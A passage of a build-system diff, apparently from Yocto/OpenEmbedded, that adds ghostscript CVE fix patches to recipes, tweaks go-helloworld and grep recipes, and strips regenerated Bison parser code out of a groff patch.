file://do-not-check-local-libpng-source.patch \
file://avoid-host-contamination.patch \
file://mkdir-p.patch \
+ file://CVE-2020-15900.patch \
+ file://check-stack-limits-after-function-evalution.patch \
+ file://CVE-2021-45949.patch \
+ file://CVE-2021-3781_1.patch \
+ file://CVE-2021-3781_2.patch \
+ file://CVE-2021-3781_3.patch \
+ file://CVE-2023-28879.patch \
+ file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \
+ file://CVE-2023-36664-pre1.patch \
+ file://CVE-2023-36664-1.patch \
+ file://CVE-2023-36664-2.patch \
+ file://CVE-2023-43115.patch \
+ file://CVE-2020-36773.patch \
"
SRC_URI = "${SRC_URI_BASE} \
file://ghostscript-9.21-prevent_recompiling.patch \
file://cups-no-gcrypt.patch \
- file://CVE-2020-15900.patch \
"
SRC_URI_class-native = "${SRC_URI_BASE} \
diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
index ab70ea98a3..7d0f74186e 100644
--- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
+++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-extended/grep/grep_3.4.bb b/meta/recipes-extended/grep/grep_3.4.bb
index e176dd727b..46ac4cfb00 100644
--- a/meta/recipes-extended/grep/grep_3.4.bb
+++ b/meta/recipes-extended/grep/grep_3.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "GNU grep utility"
HOMEPAGE = "http://savannah.gnu.org/projects/grep/"
+DESCRIPTION = "Grep searches one or more input files for lines containing a match to a specified pattern. By default, grep prints the matching lines."
BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep"
SECTION = "console/utils"
LICENSE = "GPLv3"
diff --git a/meta/recipes-extended/groff/files/0001-Include-config.h.patch b/meta/recipes-extended/groff/files/0001-Include-config.h.patch
index 348a61d9df..46065bc513 100644
--- a/meta/recipes-extended/groff/files/0001-Include-config.h.patch
+++ b/meta/recipes-extended/groff/files/0001-Include-config.h.patch
@@ -17,6 +17,9 @@ In file included from TOPDIR/build/tmp/work/aarch64-yoe-linux-musl/groff/1.22.4-
^
./lib/math.h:40:1: error: unknown type name '_GL_INLINE_HEADER_BEGIN'
+We delete eqn.cpp and qen.hpp in do_configure
+to ensure they're regenerated and deterministic.
+
Upstream-Status: Pending
Signed-off-by: Khem Raj <raj.khem@gmail.com>
---
@@ -140,1029 +143,6 @@ index f95c05e..d875045 100644
#include <string.h>
#include <stdlib.h>
-diff --git a/src/preproc/eqn/eqn.cpp b/src/preproc/eqn/eqn.cpp
-index 4ede465..fdd9484 100644
---- a/src/preproc/eqn/eqn.cpp
-+++ b/src/preproc/eqn/eqn.cpp
-@@ -1,8 +1,9 @@
--/* A Bison parser, made by GNU Bison 3.2. */
-+/* A Bison parser, made by GNU Bison 3.4.1. */
-
- /* Bison implementation for Yacc-like parsers in C
-
-- Copyright (C) 1984, 1989-1990, 2000-2015, 2018 Free Software Foundation, Inc.
-+ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2019 Free Software Foundation,
-+ Inc.
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
-@@ -47,7 +48,7 @@
- #define YYBISON 1
-
- /* Bison version. */
--#define YYBISON_VERSION "3.2"
-+#define YYBISON_VERSION "3.4.1"
-
- /* Skeleton name. */
- #define YYSKELETON_NAME "yacc.c"
-@@ -65,7 +66,11 @@
-
-
- /* First part of user prologue. */
--#line 18 "../src/preproc/eqn/eqn.ypp" /* yacc.c:338 */
-+#line 18 "src/preproc/eqn/eqn.ypp"
-+
-+#if HAVE_CONFIG_H
-+# include <config.h>
-+#endif
-
- #include <stdio.h>
- #include <string.h>
-@@ -77,7 +82,8 @@ extern int non_empty_flag;
- int yylex();
- void yyerror(const char *);
-
--#line 81 "src/preproc/eqn/eqn.cpp" /* yacc.c:338 */
-+#line 86 "src/preproc/eqn/eqn.cpp"
-+
- # ifndef YY_NULLPTR
- # if defined __cplusplus
- # if 201103L <= __cplusplus
-@@ -98,8 +104,8 @@ void yyerror(const char *);
- # define YYERROR_VERBOSE 0
- #endif
-
--/* In a future release of Bison, this section will be replaced
-- by #include "y.tab.h". */
-+/* Use api.header.include to #include this header
-+ instead of duplicating it here. */
- #ifndef YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED
- # define YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED
- /* Debug traces. */
-@@ -237,10 +243,9 @@ extern int yydebug;
-
- /* Value type. */
- #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
--
- union YYSTYPE
- {
--#line 30 "../src/preproc/eqn/eqn.ypp" /* yacc.c:353 */
-+#line 34 "src/preproc/eqn/eqn.ypp"
-
- char *str;
- box *b;
-@@ -249,9 +254,9 @@ union YYSTYPE
- int n;
- column *col;
-
--#line 253 "src/preproc/eqn/eqn.cpp" /* yacc.c:353 */
--};
-+#line 258 "src/preproc/eqn/eqn.cpp"
-
-+};
- typedef union YYSTYPE YYSTYPE;
- # define YYSTYPE_IS_TRIVIAL 1
- # define YYSTYPE_IS_DECLARED 1
-@@ -366,6 +371,8 @@ typedef short yytype_int16;
- #endif
-
-
-+#define YY_ASSERT(E) ((void) (0 && (E)))
-+
- #if ! defined yyoverflow || YYERROR_VERBOSE
-
- /* The parser invokes alloca or malloc; define the necessary symbols. */
-@@ -508,16 +515,16 @@ union yyalloc
- /* YYNSTATES -- Number of states. */
- #define YYNSTATES 142
-
--/* YYTRANSLATE[YYX] -- Symbol number corresponding to YYX as returned
-- by yylex, with out-of-bounds checking. */
- #define YYUNDEFTOK 2
- #define YYMAXUTOK 315
-
-+/* YYTRANSLATE(TOKEN-NUM) -- Symbol number corresponding to TOKEN-NUM
-+ as returned by yylex, with out-of-bounds checking. */
- #define YYTRANSLATE(YYX) \
- ((unsigned) (YYX) <= YYMAXUTOK ? yytranslate[YYX] : YYUNDEFTOK)
-
- /* YYTRANSLATE[TOKEN-NUM] -- Symbol number corresponding to TOKEN-NUM
-- as returned by yylex, without out-of-bounds checking. */
-+ as returned by yylex. */
- static const yytype_uint8 yytranslate[] =
- {
- 0, 2, 2, 2, 2, 2, 2, 2, 2, 63,
-@@ -558,14 +565,14 @@ static const yytype_uint8 yytranslate[] =
- /* YYRLINE[YYN] -- Source line where rule number YYN was defined. */
- static const yytype_uint16 yyrline[] =
- {
-- 0, 121, 121, 123, 128, 130, 141, 143, 145, 150,
-- 152, 154, 156, 158, 163, 165, 167, 169, 174, 176,
-- 181, 183, 185, 190, 192, 194, 196, 198, 200, 202,
-- 204, 206, 208, 210, 212, 214, 216, 218, 220, 222,
-- 224, 226, 228, 230, 232, 234, 236, 238, 240, 242,
-- 244, 246, 248, 250, 252, 254, 259, 269, 271, 276,
-- 278, 283, 285, 290, 292, 297, 299, 304, 306, 308,
-- 310, 314, 316, 321, 323, 325
-+ 0, 125, 125, 127, 132, 134, 145, 147, 149, 154,
-+ 156, 158, 160, 162, 167, 169, 171, 173, 178, 180,
-+ 185, 187, 189, 194, 196, 198, 200, 202, 204, 206,
-+ 208, 210, 212, 214, 216, 218, 220, 222, 224, 226,
-+ 228, 230, 232, 234, 236, 238, 240, 242, 244, 246,
-+ 248, 250, 252, 254, 256, 258, 263, 273, 275, 280,
-+ 282, 287, 289, 294, 296, 301, 303, 308, 310, 312,
-+ 314, 318, 320, 325, 327, 329
- };
- #endif
-
-@@ -818,22 +825,22 @@ static const yytype_uint8 yyr2[] =
-
- #define YYRECOVERING() (!!yyerrstatus)
-
--#define YYBACKUP(Token, Value) \
--do \
-- if (yychar == YYEMPTY) \
-- { \
-- yychar = (Token); \
-- yylval = (Value); \
-- YYPOPSTACK (yylen); \
-- yystate = *yyssp; \
-- goto yybackup; \
-- } \
-- else \
-- { \
-- yyerror (YY_("syntax error: cannot back up")); \
-- YYERROR; \
-- } \
--while (0)
-+#define YYBACKUP(Token, Value) \
-+ do \
-+ if (yychar == YYEMPTY) \
-+ { \
-+ yychar = (Token); \
-+ yylval = (Value); \
-+ YYPOPSTACK (yylen); \
-+ yystate = *yyssp; \
-+ goto yybackup; \
-+ } \
-+ else \
-+ { \
-+ yyerror (YY_("syntax error: cannot back up")); \
-+ YYERROR; \
-+ } \
-+ while (0)
-
- /* Error token number */
- #define YYTERROR 1
-@@ -948,7 +955,7 @@ yy_reduce_print (yytype_int16 *yyssp, YYSTYPE *yyvsp, int yyrule)
- YYFPRINTF (stderr, " $%d = ", yyi + 1);
- yy_symbol_print (stderr,
- yystos[yyssp[yyi + 1 - yynrhs]],
-- &(yyvsp[(yyi + 1) - (yynrhs)])
-+ &yyvsp[(yyi + 1) - (yynrhs)]
- );
- YYFPRINTF (stderr, "\n");
- }
-@@ -1052,7 +1059,10 @@ yytnamerr (char *yyres, const char *yystr)
- case '\\':
- if (*++yyp != '\\')
- goto do_not_strip_quotes;
-- /* Fall through. */
-+ else
-+ goto append;
-+
-+ append:
- default:
- if (yyres)
- yyres[yyn] = *yyp;
-@@ -1148,10 +1158,10 @@ yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
- yyarg[yycount++] = yytname[yyx];
- {
- YYSIZE_T yysize1 = yysize + yytnamerr (YY_NULLPTR, yytname[yyx]);
-- if (! (yysize <= yysize1
-- && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
-+ if (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM)
-+ yysize = yysize1;
-+ else
- return 2;
-- yysize = yysize1;
- }
- }
- }
-@@ -1175,9 +1185,10 @@ yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
-
- {
- YYSIZE_T yysize1 = yysize + yystrlen (yyformat);
-- if (! (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
-+ if (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM)
-+ yysize = yysize1;
-+ else
- return 2;
-- yysize = yysize1;
- }
-
- if (*yymsg_alloc < yysize)
-@@ -1303,23 +1314,33 @@ yyparse (void)
- yychar = YYEMPTY; /* Cause a token to be read. */
- goto yysetstate;
-
-+
- /*------------------------------------------------------------.
--| yynewstate -- Push a new state, which is found in yystate. |
-+| yynewstate -- push a new state, which is found in yystate. |
- `------------------------------------------------------------*/
-- yynewstate:
-+yynewstate:
- /* In all cases, when you get here, the value and location stacks
- have just been pushed. So pushing a state here evens the stacks. */
- yyssp++;
-
-- yysetstate:
-+
-+/*--------------------------------------------------------------------.
-+| yynewstate -- set current state (the top of the stack) to yystate. |
-+`--------------------------------------------------------------------*/
-+yysetstate:
-+ YYDPRINTF ((stderr, "Entering state %d\n", yystate));
-+ YY_ASSERT (0 <= yystate && yystate < YYNSTATES);
- *yyssp = (yytype_int16) yystate;
-
- if (yyss + yystacksize - 1 <= yyssp)
-+#if !defined yyoverflow && !defined YYSTACK_RELOCATE
-+ goto yyexhaustedlab;
-+#else
- {
- /* Get the current used size of the three stacks, in elements. */
- YYSIZE_T yysize = (YYSIZE_T) (yyssp - yyss + 1);
-
--#ifdef yyoverflow
-+# if defined yyoverflow
- {
- /* Give user a chance to reallocate the stack. Use copies of
- these so that the &'s don't force the real ones into
-@@ -1338,10 +1359,7 @@ yyparse (void)
- yyss = yyss1;
- yyvs = yyvs1;
- }
--#else /* no yyoverflow */
--# ifndef YYSTACK_RELOCATE
-- goto yyexhaustedlab;
--# else
-+# else /* defined YYSTACK_RELOCATE */
- /* Extend the stack our own way. */
- if (YYMAXDEPTH <= yystacksize)
- goto yyexhaustedlab;
-@@ -1357,12 +1375,11 @@ yyparse (void)
- goto yyexhaustedlab;
- YYSTACK_RELOCATE (yyss_alloc, yyss);
- YYSTACK_RELOCATE (yyvs_alloc, yyvs);
--# undef YYSTACK_RELOCATE
-+# undef YYSTACK_RELOCATE
- if (yyss1 != yyssa)
- YYSTACK_FREE (yyss1);
- }
- # endif
--#endif /* no yyoverflow */
-
- yyssp = yyss + yysize - 1;
- yyvsp = yyvs + yysize - 1;
-@@ -1373,19 +1390,18 @@ yyparse (void)
- if (yyss + yystacksize - 1 <= yyssp)
- YYABORT;
- }
--
-- YYDPRINTF ((stderr, "Entering state %d\n", yystate));
-+#endif /* !defined yyoverflow && !defined YYSTACK_RELOCATE */
-
- if (yystate == YYFINAL)
- YYACCEPT;
-
- goto yybackup;
-
-+
- /*-----------.
- | yybackup. |
- `-----------*/
- yybackup:
--
- /* Do appropriate processing given the current state. Read a
- lookahead token if we need one and don't already have one. */
-
-@@ -1443,7 +1459,6 @@ yybackup:
- YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
- *++yyvsp = yylval;
- YY_IGNORE_MAYBE_UNINITIALIZED_END
--
- goto yynewstate;
-
-
-@@ -1458,7 +1473,7 @@ yydefault:
-
-
- /*-----------------------------.
--| yyreduce -- Do a reduction. |
-+| yyreduce -- do a reduction. |
- `-----------------------------*/
- yyreduce:
- /* yyn is the number of a rule to reduce with. */
-@@ -1478,20 +1493,20 @@ yyreduce:
- YY_REDUCE_PRINT (yyn);
- switch (yyn)
- {
-- case 3:
--#line 124 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+ case 3:
-+#line 128 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].b)->top_level(); non_empty_flag = 1; }
--#line 1485 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1500 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 4:
--#line 129 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 133 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1491 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1506 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 5:
--#line 131 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 135 "src/preproc/eqn/eqn.ypp"
- {
- list_box *lb = (yyvsp[-1].b)->to_list_box();
- if (!lb)
-@@ -1499,436 +1514,437 @@ yyreduce:
- lb->append((yyvsp[0].b));
- (yyval.b) = lb;
- }
--#line 1503 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1518 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 6:
--#line 142 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 146 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1509 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1524 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 7:
--#line 144 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 148 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_mark_box((yyvsp[0].b)); }
--#line 1515 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1530 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 8:
--#line 146 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 150 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_lineup_box((yyvsp[0].b)); }
--#line 1521 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1536 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 9:
--#line 151 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 155 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1527 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1542 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 10:
--#line 153 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 157 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-2].b), 0, (yyvsp[0].b)); }
--#line 1533 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1548 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 11:
--#line 155 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 159 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-2].b), (yyvsp[0].b), 0); }
--#line 1539 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1554 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 12:
--#line 157 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 161 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-4].b), (yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1545 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1560 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 13:
--#line 159 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 163 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-4].b), make_limit_box((yyvsp[-2].b), (yyvsp[0].b), 0), 0); }
--#line 1551 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1566 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 14:
--#line 164 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 168 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1557 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1572 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 15:
--#line 166 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 170 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_sqrt_box((yyvsp[0].b)); }
--#line 1563 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1578 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 16:
--#line 168 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 172 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_over_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1569 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1584 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 17:
--#line 170 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 174 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_small_over_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1575 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1590 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 18:
--#line 175 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 179 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1581 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1596 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 19:
--#line 177 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 181 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-2].b), 0, (yyvsp[0].b)); }
--#line 1587 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1602 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 20:
--#line 182 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 186 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1593 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1608 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 21:
--#line 184 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 188 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-2].b), (yyvsp[0].b), 0); }
--#line 1599 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1614 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 22:
--#line 186 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 190 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-4].b), (yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1605 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1620 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 23:
--#line 191 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 195 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = split_text((yyvsp[0].str)); }
--#line 1611 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1626 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 24:
--#line 193 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 197 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new quoted_text_box((yyvsp[0].str)); }
--#line 1617 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1632 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 25:
--#line 195 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 199 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = split_text((yyvsp[0].str)); }
--#line 1623 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1638 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 26:
--#line 197 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 201 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new quoted_text_box((yyvsp[0].str)); }
--#line 1629 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1644 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 27:
--#line 199 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 203 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new half_space_box; }
--#line 1635 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1650 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 28:
--#line 201 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 205 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new space_box; }
--#line 1641 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1656 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 29:
--#line 203 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 207 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new tab_box; }
--#line 1647 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1662 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 30:
--#line 205 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 209 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[-1].b); }
--#line 1653 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1668 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 31:
--#line 207 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 211 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(CENTER_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1659 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1674 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 32:
--#line 209 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 213 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(LEFT_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1665 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1680 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 33:
--#line 211 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 215 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(RIGHT_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1671 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1686 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 34:
--#line 213 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 217 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(CENTER_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1677 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1692 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 35:
--#line 215 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 219 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[-1].mb); }
--#line 1683 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1698 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 36:
--#line 217 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 221 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_delim_box((yyvsp[-3].str), (yyvsp[-2].b), (yyvsp[0].str)); }
--#line 1689 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1704 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 37:
--#line 219 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 223 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_delim_box((yyvsp[-1].str), (yyvsp[0].b), 0); }
--#line 1695 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1710 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 38:
--#line 221 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 225 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_overline_box((yyvsp[-1].b)); }
--#line 1701 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1716 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 39:
--#line 223 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 227 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_underline_box((yyvsp[-1].b)); }
--#line 1707 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1722 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 40:
--#line 225 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 229 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_prime_box((yyvsp[-1].b)); }
--#line 1713 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1728 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 41:
--#line 227 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 231 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_accent_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1719 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1734 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 42:
--#line 229 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 233 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_uaccent_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1725 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1740 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 43:
--#line 231 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 235 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_grfont()), (yyvsp[0].b)); }
--#line 1731 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1746 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 44:
--#line 233 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 237 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_gbfont()), (yyvsp[0].b)); }
--#line 1737 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1752 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 45:
--#line 235 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 239 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_gfont()), (yyvsp[0].b)); }
--#line 1743 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1758 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 46:
--#line 237 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 241 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new fat_box((yyvsp[0].b)); }
--#line 1749 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1764 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 47:
--#line 239 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 243 "src/preproc/eqn/eqn.ypp"
